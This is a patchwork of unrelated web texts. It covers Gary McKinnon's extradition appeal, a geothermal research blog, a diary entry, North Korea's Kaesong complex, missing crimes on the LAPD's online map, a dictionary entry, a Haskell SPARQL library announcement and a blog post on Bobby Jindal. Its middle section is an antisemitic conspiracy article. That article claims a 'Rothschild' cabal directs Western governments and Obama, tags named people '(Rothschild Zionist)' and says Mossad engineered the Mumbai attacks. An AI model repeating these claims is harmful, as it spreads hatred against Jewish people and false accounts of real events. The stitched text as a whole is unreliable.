He added that it was open to McKinnon to seek to appeal to the House of Lords .
McKinnon 's solicitor , Karen Todner , said she would lodge an appeal against the decision within 28 days and , if possible , take it to the new supreme court and even to Europe .
Whether a further appeal will be allowed will be decided at a later date .
Burnton said it was a matter that should be dealt with " as expeditiously as possible " , probably in September .
Todner described the ruling as " hugely disappointing " , but she said the legal team would not be giving up .
" Alan Johnson still has the power to act .
We have 28 days to review the judgment and we will continue to explore every legal avenue until we achieve a just and proper result . "
After the decision , Sharp said : " Our hope still lies with the government .
What evidence do Gordon Brown and Alan Johnson need to understand what extraditing Gary would do to him , let alone us ?
" Gary would not survive and I would not see my son again .
All to oblige the Americans ?
If Gary 's was such a dreadful crime , he should have been prosecuted and sentenced here years ago .
" Instead he 's been left tortured by fear for seven years .
Compassion can and must now prevail . "
McKinnon has admitted hacking into the computer systems of the US defence department and Nasa , but his supporters argued his obsessions led to his misguided hacking activities from his flat in Wood Green , north London , and that he should be tried in Britain .
The Free Gary campaign has won the support of more than 100 MPs and received vociferous backing from the Daily Mail and celebrities such as as Bob Geldof , Chrissie Hynde , Barry Norman , Jilly Cooper and Julie Christie .
The government 's independent reviewer of anti-terrorist legislation , Lord Carlile , intervened to say that prosecuting McKinnon in the US would be " cruel and unconscionable " because of his medical condition .
Gordon Brown 's wife , Sarah , met McKinnon 's mother to express her concern , while the prime minister last week said : " Anybody who looks at this must be sympathetic to someone who suffers from Asperger 's syndrome . "
McKinnon admitted hacking into 97 computers , leaving a message in US military systems saying : " I will continue to disrupt . "
The US government said repairs cost $ 700,000 ( £ 430,000 ) and the Crown Prosecution Service said his hacking activities were not random experiments in hacking but a deliberate effort to breach US defence systems in 2001 - 02 .
McKinnon challenged Starmer 's decision not to put him on trial in Britain .
The hacker argued that extradition would have disastrous consequences , including possible psychosis and suicide because of his autistic spectrum medical condition .
McKinnon has spoken about his fears , saying that he wakes every morning " feeling as though someone has taken a sledgehammer to my chest during the night " .
His lawyers argue that extradition arrangements between Britain and the US are imbalanced .
Figures released this week to the Liberal Democrats in response to parliamentary questions reveal Britain has extradited twice as many criminal suspects to the US as those who have gone the other way .
Suspects in the US are 20 % less likely to be extradited than those living in Britain .
Critics say this indicates Britons have " second - class status " when it comes to being sent for trial in the US .
There ’s something hopeful about going to school .
School is about the future , no matter what your age .
There ’s a sense that you ’re studying something because you ’ll need it at some point .
Or you ’ll need the degree , and since you need the degree , you need to take these five classes whether you want to or not .
Sure , there ’s the day - to - day drudgery of class , online or in [ … ]
Hello all ...
Talk about deja vu .
Was I watching protests in the Ukraine this week ?
Or Georgia ?
It certainly looked like it .
But , no , it was Iran .
I knew because the colour was different .
In Georgia in 2003 the colour was red , or ' rose ' , and in the Ukraine in 2004 it was orange .
In Iran this week , it is green .
Apart from that , the same modus operandi was playing out once again orchestrated by the usual suspects hiding in the shadows .
Most people see events in terms of polarities .
It is either / or and black and white .
For example , you are either for something or against it .
Yet rarely is any situation so polarised , so clear - cut , and unless we look at the shades of grey we are never going to see what is truly going on .
To say the protests in Iran this week have been covertly manipulated by the United States , United Kingdom and Israel is not to say that I support the Iranian president , Mahmoud Ahmadinejad , or the ' Supreme Leader ' dictatorship that really runs the country .
Nor does it mean that I do not support the right of Iranian people to say what they feel about an election they believe to be rigged .
But there is another story to tell here that involves American , British and Israeli intelligence and the billionaire financier and Obama backer , George Soros .
This intelligence trio and Soros have a common connecting force : the House of Rothschild .
Mossad operative , George Soros
The spider 's web that has been spun around the earth has its operational centre in Europe , in London , Rome , Paris , Berlin and Brussels .
It is structured like a transnational corporation with the headquarters dictating ' corporate ' policy to the ' subsidiary companies ' , the secret society networks in each country that answer to the ' spider ' .
In turn , these national networks have their own subsidiaries in the cities , towns and communities .
In this way , the spider , which is very closely connected to the Rothschild dynasty , can influence all levels of society in any country and Iran is no different .
It may not be as easy in Iran as it would be in Britain or America , but they can still do it and have done it many times .
In 1953 , the Iranian Prime Minister Dr Mohammed Mossadegh was ousted in a CIA - planned coup called Operation Ajax and British and American manipulation replaced him with the vicious dictator , the Shah of Iran .
This was agreed by US President Dwight D. Eisenhower and British Prime Minister , Winston Churchill , and directed by the infamous US Secretary of State John Foster Dulles and his brother , Allen Dulles , head of the CIA .
Official documents have since confirmed this .
Mossadegh 's crime was to insist that the people of Iran enjoyed some benefits from Iranian oil .
He nationalised the oil industry that had been controlled by the British government via the Anglo - Iranian Oil Company , now British Petroleum , or BP .
Mossadegh said in 1951 : ' Our long years of negotiations with foreign countries ... have yielded no results this far .
With the oil revenues we could meet our entire budget and combat poverty , disease , and backwardness among our people .
Another important consideration is that by the elimination of the power of the British company , we would also eliminate corruption and intrigue , by means of which the internal affairs of our country have been influenced .
Once this tutelage has ceased , Iran will have achieved its economic and political independence . '
The British and American governments determined that it would not cease , however , and so enter Kermit Roosevelt , Jr. , the grandson of President Theodore Roosevelt , and head of the CIA 's Near East and Africa division .
He worked closely with another CIA agent called Donald Wilbur , as revealed in a CIA document entitled Clandestine Service History - Overthrow of Premier Mosaddeq of Iran - November 1952 - August 1953 .
Kermit Roosevelt , Jr. The document details the way the coup against Mossadegh was engineered to bring the Shah to power and it puts new light on the ' people 's revolutions ' in Georgia and the Ukraine and the protests in Iran this week .
The CIA began a campaign of propaganda against Mossadegh within Iran and paid people to pose as Mossadegh supporters and threaten ' savage punishment ' against anyone who opposed him , especially Muslims leaders .
This allowed the CIA to depict Mossadegh as a tyrannical dictator and the propaganda began to stir opposition protests from religious groups .
There were eventually massive protests in the streets of Tehran organised by Roosevelt 's Operation Ajax .
Roosevelt revealed in his 1979 book , Counter Coup : The Struggle for the Control of Iran , how he paid people to protest for and against Mossadegh to trigger violent clashes that led to widespread violence , looting and 300 dead .
Outside of Tehran , tribesmen were paid to support a coup to replace Mossadegh with the Shah .
Roosevelt secured control of the Iranian military with help from Norman Schwarzkopf Sr. , the father of ' Stormin ' Norman ' , who commanded the US military and their allies in the Gulf War of 1991 .
Father Schwarzkopf trained and organised security forces in support of the Shah which later became the horrific secret police known as the SAVAK .
The Iranian military intervened to remove Mossadegh who was jailed and then lived out his life under house arrest .
The Shah was placed into ' power ' as a puppet of Britain and America and , surprise , surprise , he reached agreement with the oil companies to give them the vast majority of Iranian oil revenues .
The same combination removed the Shah for Ayatollah Khomeini in 1979 .
They want to give the impression of spontaneous ' peoples revolutions ' because it hides the covert manipulation of events and the involvement of the Rothschild ' axis - of - evil ' - British , American and Israeli intelligence .
This is what happened in Georgia in 2003 when Mikhail Saakashvili was brought to power by a CIA / Soros - engineered ' people 's revolution ' , or the ' Revolution of Roses ' , which removed President Eduard Shevardnadze .
In Georgia , the colour was red .
Saakashvili is a graduate of George Washington University in Washington DC and Columbia University Law School in New York .
He is one of many American - trained agents controlled by the network of financier George Soros and his associate , Zbigniew Brzezinski , the former National Security Advisor to Jimmy Carter and co-founder of the Trilateral Commission .
Both are mentors to President Obama .
Soros manipulates events through a complex network of foundations and organisations operating across the world in league with elite groups and agencies in the United States and Israel , including the CIA and Mossad .
It was this Soros network , especially his Open Society Institute , which trained and funded Georgian students in the art of mass protest and funded the opposition TV station that mobilised the demonstrations .
Zaza Gachechiladze , editor - in - chief of The Georgian Messenger , said : ' It 's generally accepted public opinion here that Mr. Soros is the person who planned Shevardnadze 's overthrow . '
As Manly P. Hall , the 33rd Degree Freemason and ' Masonry 's greatest philosopher ' , said : '... it is so difficult to determine the position of the ancient initiates ...
They are the invisible powers behind the thrones of earth , and men are but marionettes , dancing while the invisible ones pull the strings .
We see the dancer , but the master mind that does the work remains concealed by the cloak of silence . '
These ' people 's revolutions ' are really coups in disguise and they take the same pattern of election victories claimed to be fraudulent followed by public demonstrations .
Invariably , they are symbolised by a colour worn by the demonstrators .
It is classic , therefore , to see the colour green at the centre of protests in Iran .
The ' hero ' in the latest colour - coded drama is Mir-Hossein Mousavi , the prime minister from 1981 to 1989 , who claims that Ahmadinejad 's election victory , officially by a landslide , was fixed .
Mousavi claimed victory and urged his supporters to protest .
Mir-Hossein Mousavi : Mr. Green .
Now it may or may not have been fixed , though no evidence has yet been produced , but events have followed a very familiar pattern .
President Saakashvili claimed he had won an election in Georgia , but had been denied by vote - rigging .
Protests followed that put him in power .
President Viktor Yushchenko claimed he had won an election in the Ukraine , but had been denied by vote - rigging .
Protests followed that over - turned the result and led to a new election that put him in power .
In the Ukraine , the colour was orange .
Researcher Paul Craig Roberts put it very well in a CounterPunch article this week : ' The claim is made that Ahmadinejad stole the election , because the outcome was declared too soon after the polls closed for all the votes to have been counted .
However , Mousavi declared his victory several hours before the polls closed .
This is classic CIA destabilization designed to discredit a contrary outcome .
It forces an early declaration of the vote .
The longer the time interval between the pre-emptive declaration of victory and the release of the vote tally , the longer Mousavi has to create the impression that the authorities are using the time to fix the vote .
It is amazing that people do n't see through this trick . '
As Roberts points out , the evidence for CIA involvement in this week 's events is overwhelming .
Their fingerprints are everywhere .
Two years ago , ABC News reported that the Bush administration had given secret approval for the CIA to launch a covert operation to destabilise the Iranian government .
Pity old Kermit 's not still around , he had the blueprint .
The London Daily Telegraph reported in 2007 : ' Mr. Bush has signed an official document endorsing CIA plans for a propaganda and disinformation campaign intended to destabilise , and eventually topple , the theocratic rule of the mullahs . '
You might also recall the story in 2008 that received quite wide publicity when investigative journalist Seymour Hersh wrote this in the New Yorker : ' Late last year , Congress agreed to a request from President Bush to fund a major escalation of covert operations against Iran , according to current and former military , intelligence , and congressional sources .
These operations , for which the President sought up to four hundred million dollars , were described in a Presidential Finding signed by Bush , and are designed to destabilize the country 's religious leadership . '
The day before the Iranian election , the neoconservative extremist , Kenneth Timmerman ( Rothschild Zionist ) , said there was ' talk of a ' green revolution in Tehran ' .
What is he , a bloody psychic ?
Well , no , he does n't have to be .
Timmerman co-founded the Foundation for Democracy in Iran ( FDI ) in 1995 along with Joshua Muravchik ( Rothschild Zionist ) and the late Peter W. Rodham ( Rothschild Zionist ) .
Kenneth Timmerman
The FDI is an extremely well - funded operation to create unrest in Iran and one its founders , Joshua Muravchik , wrote an article in the Los Angeles Times calling for Iran to be bombed .
Timmerman was among the major propaganda architects of the Iraq invasion and one of his articles carried this confident headline six months before the troops went in : ' How Saddam Got Weapons of Mass Destruction : Saddam Hussein 's War Machine Is Being Built Systematically to Strike At the United States With New Nuclear , Biological and Chemical Weapons Designed to Kill Millions . '
Timmerman predicted the ' green revolution ' the day before the Iranian election because he knew what was planned and his own organisation would have been seriously involved .
Timmerman also wrote : ' The National Endowment for Democracy has spent millions of dollars during the past decade promoting ' color ' revolutions in places such as Ukraine and Serbia , training political workers in modern communications and organizational techniques .
Some of that money appears to have made it into the hands of pro-Mousavi groups , who have ties to non-governmental organizations outside Iran that the National Endowment for Democracy funds . '
The National Endowment for Democracy ( NED ) was established in 1983 by an act of Congress and plays a major role in destabilising target countries .
Bill Berkowitz ofWorking for Change says : ' The NED functions as a full - service infrastructure building clearinghouse .
It provides money , technical support , supplies , training programs , media know - how , public relations assistance and state - of - the - art equipment to select political groups , civic organizations , labor unions , dissident movements , student groups , book publishers , newspapers , and other media .
Its aim is to destabilize progressive movements , particularly those with a socialist or democratic socialist bent . '
More accurately , I would say , it attacks any regime that is potentially in the way of the Rothschild agenda .
Barack Obama has said America wo n't meddle in the internal affairs of Iran when this is precisely what is happening .
He plans to fund Iranian dissident groups with $ 20 million in USAID grants , but that is a fraction of the money being spent in secret .
The man is such a fraud .
The Israeli Mossad is also deeply involved in covert operations inside Iran .
Meir Dagan , a former commando and retired general , took over Mossad in 2002 and , according to ' security sources ' quoted in the media , his brief was to monitor and sabotage the Iranian nuclear program ahead of any decision by Israel to use air strikes .
Dagan was reappointed this week until 2010 .
Western media reports have claimed Mossad involvement in sabotage at Iranian nuclear facilities and attacks on Iranian scientists and military personnel .
In Iran , the colour is green .
Sitting in the middle , like a violin waiting to be played , are the people of these target countries who have genuine grievances against the incumbent regime .
This dissatisfaction with the status quo is exploited by the agent provocateurs and propaganda that generates the mass protests to bring about the goal of the manipulation - ' regime change ' .
But while the names and faces may change , those in the shadows simply increase the power and influence they have over the country by having their puppets in political office .
President Saakashvili in Georgia would hardly blow his nose without asking the United States for permission .
Some ' people 's revolution ' , eh ?
It 's simple .
Instead of invading a country to install the leaders you want , get the population to do it for you while thinking they are a symbol of ' people power ' .
John Bolton , the neoconservative crazy in the Bush administration , said a US military attack on Iran would only happen if economic sanctions and attempts to foment a ' popular revolution ' failed .
This focus on Iran is once again connected to the domination of the gathering global battleground that Brzezinski calls ' Eurasia ' .
Have a look at this map of Eurasia and see how many countries are subject to unrest , conflict and invasion in the region surrounding Iran .
This is the whole of Eurasia and below is the area that is being especially targeted ...
The military and covert operations orchestrated by Britain , America and Israel , all controlled by the House of Rothschild , have invaded and destabilised Iraq and Afghanistan and are now moving in on Pakistan with their mounting campaign of bombing .
The engineered terrorist attacks in Mumbai , a speciality of Mossad , are part of the destabilisation of India .
Two Taliban militant leaders , who defected from the notorious Taliban chief in Pakistan , Baitullah Mehsud , the mass killer of civilians and military personnel , said he was an ' American agent ' pursuing a US - Israeli agenda in Pakistan .
One of them , Turkistan Bittani , said that Mehsud was being funded by US and Israeli intelligence services for brainwashing innocent youths .
Bittani pointed out that the al - Qaeda and Taliban leadership had never been targeted by the dozens of US drone strikes in Pakistan 's north - west region .
The other defector , Qari Zainuddin , said that Mehsud had established strong links with Israeli intelligence services which were destabilising the country .
' These people [ Mehsud and his associates ] are working against Islam ' , he said .
They are working for the Rothschild Zionists and the Illuminati .
The big prize in this area is Iran , which would connect Iraq with Afghanistan and Pakistan and give them control of a vast region from Israel to the border with China .
Iran would also give the British - American - Israeli cabal greater access to the Caspian Sea with its massive oil and gas reserves .
The plan is to control as many countries as possible that border Russia and that is the reason for the ' people 's revolutions ' in Georgia and Ukraine and their desire to join NATO .
The Rothschild cabal wants to trigger a war involving Russia and China that will bring about the planned world government and world army .
Zbigniew Brzezinski wrote in his 1997 book , The Grand Chessboard : ' Potentially , the most dangerous scenario would be a grand coalition of China , Russia , and perhaps Iran , an " anti-hegemonic " coalition united not by ideology but by complementary grievances .
It would be reminiscent in scale and scope of the challenge posed by the Sino - Soviet bloc , though this time China would likely be the leader and Russia the follower .
Averting this contingency , however remote it may be , will require a display of U.S. geostrategic skill on the western , eastern , and southern perimeters of Eurasia simultaneously . '
Brzezinski , Soros and the Rothschild Zionist network control Barack Obama and he does whatever they say .
His first act in office was to agree bombing raids on Pakistan and he has backed off from threatening Iran with a military attack while covert operations worked to oust the Iranian regime another way .
If that does n't work , you will see the atmosphere change because they want Iran and they will not stop until they get it .
Netanyahu :
If it does n't work the boys are going in ...
Standing in the wings , fingers on buttons , are the Israeli trio of shoot - to - kill maniacs , Prime Minister Netanyahu , Foreign Minister Lieberman and Defence Minister Barak , the guy in charge of operations when the Palestinians were slaughtered in Gaza .
They can't wait to scream ' chocks away ' and bomb targets in Iran and if the ' green revolution ' goes nowhere the calls for military attacks will be wound up again .
The mainstream media has reported events in Tehran this week with their usual bias and ignorance , but , as always , the truth is very different .
Scientists at the Department of Energy ’s Pacific Northwest National Laboratory will determine this year if their innovative approach can safely and economically extract and convert heat from vast untapped geothermal resources .
PNNL ’s Laboratory Fellow Pete McGrail says , “ By the end of the calendar year , we plan to have a functioning bench - top prototype generating electricity .
If successful , enhanced geothermal systems like this could become an important energy source . ”
PNNL ’s system relies on a biphasic fluid , an intermediate carrier of the heat energy from the source heat to a thermal power unit such as a steam making system or other heated gas systems .
This offers another engineering plan .
Currently hot geothermal is trying to go from hot ground water directly to steam , or using binary systems where the heat is moved to a closed loop secondary fluid that expands to gas , drives a mechanical generator of some type and condenses back to a fluid .
Now PNNL is offering what might later be called a “ trinary ” system .
Heat is moved to their fluid , which is then used to transport the heat to the generation step .
All this research and engineering is needed to confine the hot geothermal materials away from the energy production side .
Most any hot geothermal is going to bring along some dissolved minerals , stuff one ’s heat generation machinery is n’t going to react with well , like hot , mineral rich , corrosive or acidic or even radioactive material .
So having an intermediary or trinary system offers big savings for engineering and capital costs and surely will bring big savings in operating costs and maintenance .
PNNL ’s conversion system will take advantage of the rapid expansion and contraction capabilities of a new liquid developed by PNNL researchers .
To aid in efficiency , scientists have added nanostructured metal - organic heat carriers , or MOHCs , which boost the power generation capacity to near that of a conventional steam cycle .
McGrail cited PNNL ’s nanotechnology and molecular engineering expertise as an important factor in the development , noting that the advancement was an outgrowth of research already underway at the lab .
McGrail says , “ Scientific breakthroughs can come from some very unintuitive connections .
Some novel research on nanomaterials used to capture carbon dioxide from burning fossil fuels actually led us to this discovery . ”
“ By the end of the calendar year , we plan to have a functioning bench - top prototype generating electricity , ” predicts PNNL Laboratory Fellow Pete McGrail .
“ If successful , enhanced geothermal systems like this could become an important energy source . ”
That is a good position to take , as the geothermal source needs some solutions to get more market traction .
The PNNL press release also offers another link to the technical and economic analysis ( a downloading pdf file . ) conducted by the Massachusetts Institute of Technology estimates that enhanced geothermal systems could provide 10 percent of the nation ’s overall electrical generating capacity by 2050 .
The analysis looks more and more dated as the maps show great swaths of the U.S. can utilize geothermal when the mechanical details are worked out such that its can be economical and competitive .
The PNNL work offers what at first glance is another costly step in harnessing geothermal heat energy .
But such an assessment would n’t be correct .
Handling the source heat carrier is the major problem , not the power generation side .
Most any generating system can be designed at high efficiency with off the shelf technology now .
That shows the holdup is in the handling source heat .
Perhaps if the PNNL research has turns up a dirt cheap , long lasting trouble free intermediary the geothermal effort really will have great growth .
One can hope that a “ three simple systems ” from source heat to energy is better than one or two highly complex , made from exotic materials , and difficult or costly to maintain systems .
The work also gets the geothermal industry a little closer to “ heat mining ” a term we ’ll be seeing more over time .
Heat mining is more about getting the heat from deep below up to use than simply putting to work the hot water as seen at Yellowstone , Iceland and other spots where the heat is close and the water is already there .
The drive to cheaper geothermal is on , and new interfacing fluids are likely to be part of the effort .
Comments
what did i do today ?
uh …… time ’s wasting away , but i do n’t feel guilty about it .
I just wanna eat plants .
.:. my away message the above was
can you make a image with simple css commands ?
individual cells representing pixels
will that require more bandwidth than a real image ?
What is an image ?
What makes the blue light on my HD blink when it is accessing ?
Do I really want to know ?
How deep , how far do I really wanna delve into this world ?
Something , some part of me wants to know and learn more more more …
Some part of me keeps holding myself back … is this because I do n’t wanna go deeper into this particular ( and may I say , rather impersonal field ) , or is it my hold - backiness , which holds me back from my true potential ?
Why do I procrastinate , hold back , be reserved ?
What am I waiting for … there is no time like the present .
If I do n’t “ DO IT NAUGH !!! ” … is it human nature to always believe in the future ?
that there WILL be a future ?
What if there is no future for me ?
What if I am fated to die in 23 days ?
What would I do differently ?
Like it is written on the mirror … .
o Live NOW .
Sigh .
I neve was that good at foresight … or maybe I am , and just ca n’t see it .
I have an “ ultimate goal ” , but I say I do n’t know how to get there .
Is that a sign of my age , or of my personality ?
Part of me feels as if there is an eternal shark behind me ready to eat my ass up … part of me does n’t recognize this and keeps on living life , sleeping , wasting , being .
Nothing .
Its hard to break outta this cycle .
I see other people breaking outta their own respective cycles , ready to jump into their new ones , that will govern their lives for add end .
I do n’t wanna jump into THAT … but I feel restless .
I need to move on , but I do n’t wanna go to THAT .
But I NEED to move .
fuck fuck fuck … aww … there plays Nujabes + Fat Jon-Departure -“ Mystline ”
This song grounds me somewhat .
Euphoria end .
Once again … its 5 am .
Will I wake early to greet my new life ?
Or will I continue to sleep in ?
It seems so easy … why do I make it so hard ?
Years later from now , will this make sense ?
Will I laugh ?
Will I be puzzled ?
It does n’t matter .
I know that this is how I feel — no AM , right now .
This is me .
This is …why do I not like ever saying this …
Terry Yoshiaki McCall .
what a fucked up anomaly of a name huh ?
Is that why ?
Why have I always denied my middle name , seeking that Asian standard ?
I take pride in it now though .
Where will I , society , the world , human , everything , where will we be in 10 years ?
In 2030 , I will be 50 some years old .
Will I be OLD ?
I do n’t feel that way …
damn .
AP
KURT CAMPBELL , a man who would not look out of place on an American football field , likes sporting metaphors .
America 's assistant secretary of state for East Asian and Pacific affairs reckons a “ game plan ” is being developed by America and South Korea over how to deal with North Korea in coming months .
South Korea called on Monday July 20th for new efforts to persuade North Korea to end its nuclear - arms programme .
American officials too are “ in the midst of putting in place a series of actions … that are designed to put more pressure on North Korea ” to give up its nuclear bombs , Mr Campbell told reporters in Seoul .
United Nations sanctions aimed at stopping North Korea from earning money by selling arms , Mr Campbell claims , has caused “ some pain to the leadership ” in North Korea .
But before Mr Campbell arrived in South Korea , a North Korean diplomat rejected suggestions that sanctions against his country would succeed .
“ We 've been living under sanctions for over half a century , ” said Pak Tok Hun , deputy chief of North Korea 's United Nations diplomatic mission .
“ We 'll continue to live the way we always have . ”
Mr Campbell is undeterred by Mr Pak 's assertions .
He gave warning of further hardship for the North Korean people and isolation for its regime .
Mr Campbell 's message resonates with South Korea 's president , Lee Myung - bak .
Mr Lee has rejected the reconciliation and engagement of his predecessors toward North Korea .
But Mr Lee has not been able to discard all of the past .
The Kaesong industrial complex , just across the heavily fortified border in North Korea , remains in operation .
It is used by more than 100 South Korean companies as a cheap manufacturing base .
Kaesong is an important source of cash for North Korea .
South Korea 's Unification Ministry says Mr Lee wants to develop Kaesong further .
That may clash with Mr Campbell 's goal of increasing North Korea 's isolation .
Asked whether the American government supports Kaesong , Mr Campbell demurred .
South Korea 's government and corporations have invested 799 billion won ( $ 634 m ) in developing Kaesong 's infrastructure and paid $ 16 m to North Korea for the right to use the land .
Politics and business must be separate , says Park Jung - won of the Corporate Association of the Kaesong industrial complex .
South Korea and North Korea are like China and Taiwan when it comes to their political relationship in that they “ fight like cats and dogs , ” says Mr Park .
But in business Taiwan and China co-operate .
Both Koreas should use the pragmatic relationship across the Taiwan Strait as an example and develop Kaesong further , according to Mr Park .
But North Korea has used this island of capitalist endeavour in its midst as a political bargaining chip .
It cut transport links across the border with the south in March , has demanded an additional $ 500 m for land use and wants its salaries for its workers increased from about $ 50 a month to $ 300 .
South Korea has rejected demands to pay higher wages or for a revised land use fee .
Of more concern to South Korea is the kidnapping by North Korea of one of its businessmen in March .
North Korea refuses to discuss the man 's imprisonment with South Korea 's government .
It claims that the man , identified only as “ Mr Yu ” , tried to lure a North Korean female worker to the south and insulted the North Korean regime .
The kidnapping prompted a South Korean company to leave Kaesong , the first to do so .
The remaining firms are using a minimum number of South Korean staff at the industrial park , fearful that others could be taken as hostages too .
But Mr Park says that stories of a crisis at Kaesong are exaggerated .
Mr Campbell has discussed Kaesong with South Korean officials .
South Korea 's government is eager to show its unflinching support toward its most important ally .
So , as a co-operative business relationship , albeit sometime fraught , Kaesong poses a problem when increased isolation and tougher sanctions are the order of the day .
South Korea 's unification ministry says it wants “ to turn the direction of [ this ] inter-Korean relationship … toward dialogue and openness . ”
Mr Campbell may not be so eager .
The Los Angeles Police Department ’s online crime map intended for public use has failed to include nearly 40 % of serious crimes reported in the city , a Times analysis has found .
The omissions , which date back at least six months , include thousands of crimes known to LAPD officials and are included in their official crime statistics .
Among the 19,000 incidents between Jan. 1 and June 13 that do not appear at lapdcrimemaps.org :
* 26 homicides
Advertisement
* 137 rapes
* 10,766 personal , vehicle or other nonviolent thefts
In one of those rapes , a man hid in the back of a woman ’s car , forced her to drive to an abandoned North Hollywood apartment and assaulted her .
It was the kind of incident that residents of the neighborhood around Sherman Way and Kester Avenue would have wanted to know about .
The March 26 attack was reported on the LAPD ’s blog but has yet to show up on the public map .
Advertisement
The lapses mean that the map , touted by city leaders as an important and innovative resource for city residents to determine whether their neighborhoods are safe , presents a drastically incomplete image of city crime .
Some residents have tried to bring the problem to the department ’s attention , to no avail .
Jason Insalaco , a former resident of Atwater Village who uses the pen name GlendaleBlvd , posted a message about unmapped crimes in that area on a neighborhood message board earlier this year , but his concerns were dismissed by the department .
He said he was outraged by the site ’s inaccuracies .
“ The community is not being accurately informed , ” Insalaco said .
“ They are being misled and lulled into a false sense of security . ”
The Times discovered the magnitude of the problem while developing its own online map to display LAPD data .
Comparing the LAPD map with the department ’s official totals revealed that thousands of crimes through mid-June were missing .
The department ’s official crime tally recorded more than 52,000 serious crimes this year .
But the database on the public mapping site contained fewer than 33,000 for the same period .
Advertisement
Among the omissions , caused by a programming error , were more than a thousand violent robberies , including two out of seven street robberies committed in April and May by men posing as police officers .
The Times informed the LAPD last week of the discrepancy and specific examples of missing crimes .
This week , the LAPD added about 20,000 crimes from 2009 to data it provides The Times .
But as of late Wednesday , those additions had yet to appear on the LAPD map .
“ The department is looking into the issue that you brought to our attention , ” said Lt. Rick Banks , the officer in charge of the online unit .
“ When we come up with our findings , we will respond to you . ”
Advertisement
Banks declined to say whether the crimes were lost before the information was sent to the private contractors who produce the maps or whether the problems took place when the contractor processed the data .
It was also unclear whether the problem dated to the origin of the project or was more recent .
The missing crimes mark the second major problem with the LAPD ’s public maps .
In April , The Times found that programming errors by the LAPD ’s contractor had caused thousands of crimes to be mapped in the wrong place , mistakenly portraying the Los Angeles Civic Center as the most crime - ridden location in the city .
To resolve the problem , the contractor has dropped those crimes from the map , but has not yet placed them in their correct locations .
When the LAPD launched the mapping site in March 2006 , it was promoted as a publicly accessible version of Chief William J. Bratton ’s vaunted CompStat system .
CompStat is a computer - powered tracking process first developed under Bratton at the New York Police Department that uses maps to track crime trends and guide deployment .
The internal CompStat system is managed by LAPD staff , and CompStat ’s top official emphasized that the problems with the public system had not affected the department ’s internal statistics .
Advertisement
“ It ’s not something we had anything to do with , ” said Det. Jeff Godown , head of LAPD ’s CompStat unit .
“ It is what is .
It ’s for the general public .
For what we do [ at LAPD ] we have a much more robust thing . ”
By contrast , the map available to the public at lapdcrimemaps.org is a joint venture between the Web development firm LightRay Productions and the engineering company PSOMAS , which manages it .
Together , the two companies market a product known as ePolicing , which sells the mapping application first built for LAPD to other police departments .
In an e-mail to The Times late Wednesday , PSOMAS Vice President Craig Gooch said his company had identified an inadvertent programming error and fixed it .
However , reported crimes continued to be missing from both the LAPD map anddata sent to The Times .
The public map , which includes an e-mail notification service , was created as part of an overhaul of the LAPD ’s website funded with $ 362,000 raised by the Los Angeles Police Foundation .
Advertisement
The scale of the errors undermine the LAPD ’s expressed purpose in publishing the information .
LAPD officials have said that a key reason for publishing the maps is so that residents can spot crime trends .
But earlier this year when the so - called Salt & Pepper Bandit robbed 13 Los Angeles banks in less than a month , only six of the heists found their way onto the LAPD map .
In Atwater Village , Insalaco and other residents saw that about half the crimes reported by the news media had failed to appear on the LAPD ’s site .
But when their concerns about a “ massive misinformation campaign ” came to the attention of local police officials , Northeast Division Capt .
William A. Murphy dismissed them .
“ The simple answer -- no , ” Murphy wrote in an April 22 newsletter responding to Insalaco ’s allegations .
“ There is no way that we under report crimes in [ the Northeast division ] by 50 % . ”
Advertisement
Contacted Wednesday , Murphy said he was troubled by the map ’s flaws .
“ From my perspective , any time it ’s even slightly off , that can cause a question on all the statistics , ” Murphy said .
He conceded , though , that he did not check the map for accuracy even though he urged community groups to use it .
“ I ’m a police officer , I ’m relying on the technology , ” Murphy said .
“ I ’m not an expert on computer systems . ”
Advertisement
Those who are experts on technology say data omissions on this scale suggest a lack of attention to accuracy .
It means “ someone was not being particularly concerned about their data quality , ” said Clay Johnson , director of software development for the nonprofit Sunlight Foundation , which republishes government data online and urges the government to release more .
Still , Johnson commends government agencies that make an effort to post data online .
Although he called a 40 % data loss a big problem , he added that some level of error is unavoidable when working with complicated databases .
Advertisement
“ I think it is acceptable as long as it ’s correctable , ” Johnson said .
“ You have to accept failure because it ’s going happen . ”
--
ben.welsh@latimes.com
doug.smith@latimes.com
Opinion European Voters Know What They Don't Want
Was it a swing to the right -- or just a return to reality ?
The result of the EU elections is not some terrible portent of doom .
Instead , it is evidence that voters reward populists like Geert Wilders , who are not afraid to address issues that other parties do n't want to touch .
Von Henryk M. Broder
vəˈdʒaɪnə
- niː
1. ( Anatomy ) the moist canal in most female mammals , including humans , that extends from the cervix of the uterus to an external opening between the labia minora
2. ( Anatomy ) anatomy biology any sheath or sheathlike structure , such as a leaf base that encloses a stem
3. ( Biology ) anatomy biology any sheath or sheathlike structure , such as a leaf base that encloses a stem
[ Haskell - cafe ] ANN : hsparql , a SPARQL query generator / DSL and client
I 'm excited to announce the first version of hsparql .
HSparql makes it easy to query SPARQL - compliant servers using a relatively intuitive DSL and very simple client .
SPARQL is a SQL - ish query language for stores of RDF data .
So , SPARQL lets you search the structured data in several big databases .
I wrote it so that I could search DBpedia [ 1 ] , a neat site that pulls structured data from Wikipedia 's infoboxes , and also ties it to remote data services like MusicBrainz and US Census information .
HSparql is n't tied to DBpedia in any way , though , and can search any server .
The DSL looks something like this : > simple :: Query [ Variable ] > simple = do > resource <- prefix ( iriRef " http://dbpedia.org/resource/ " ) > dbpprop <- prefix ( iriRef " http://dbpedia.org/property/ " ) > foaf <- prefix ( iriRef " http://xmlns.com/foaf/0.1/ " ) > > x <- var > name <- var > page <- var > > triple x ( dbpprop .:. " genre " ) ( resource .:. " Web_browser " ) > > triple x ( foaf .:. " name " ) name > triple x ( foaf .:. " page " ) page > > return [ name , page ]
It 's currently available on Hackage [ 2 ] , and at the moment the source is only available from the tarball hosted there .
I 'd greatly appreciate any feedback on this package .
Thanks !
Jeff Wheeler [ 1 ]
http://dbpedia.org/ [ 2 ]
http://hackage.haskell.org/package/hsparql
So maybe it ’s just because I ’m overly sentimental at the moment , since I ’m in the midst of celebrating my daughter ’s first birthday ( hence the dearth of activity here … my apologies ) , but I feel sorry for Bobby Jindal .
Do n’t get me wrong :
He ’s a tool .
Really .
Seriously , a tool .
The night after Katrina hit , his minions were already out in Baton Rouge telling us how the tragedy was Blanco ’s fault ( I ran into a couple of them ) .
What a shit .
But , wow .
What a week to go through .
Let ’s take a look at it , shall we ?
Last weekend , he was still the GOP ’s great brown hope .
“ Not easily caricatured ” , he represented what could have been the perfect melding of Buckley ’s love of intelligent conservatism and Huckabee ’s love of intelligent design .
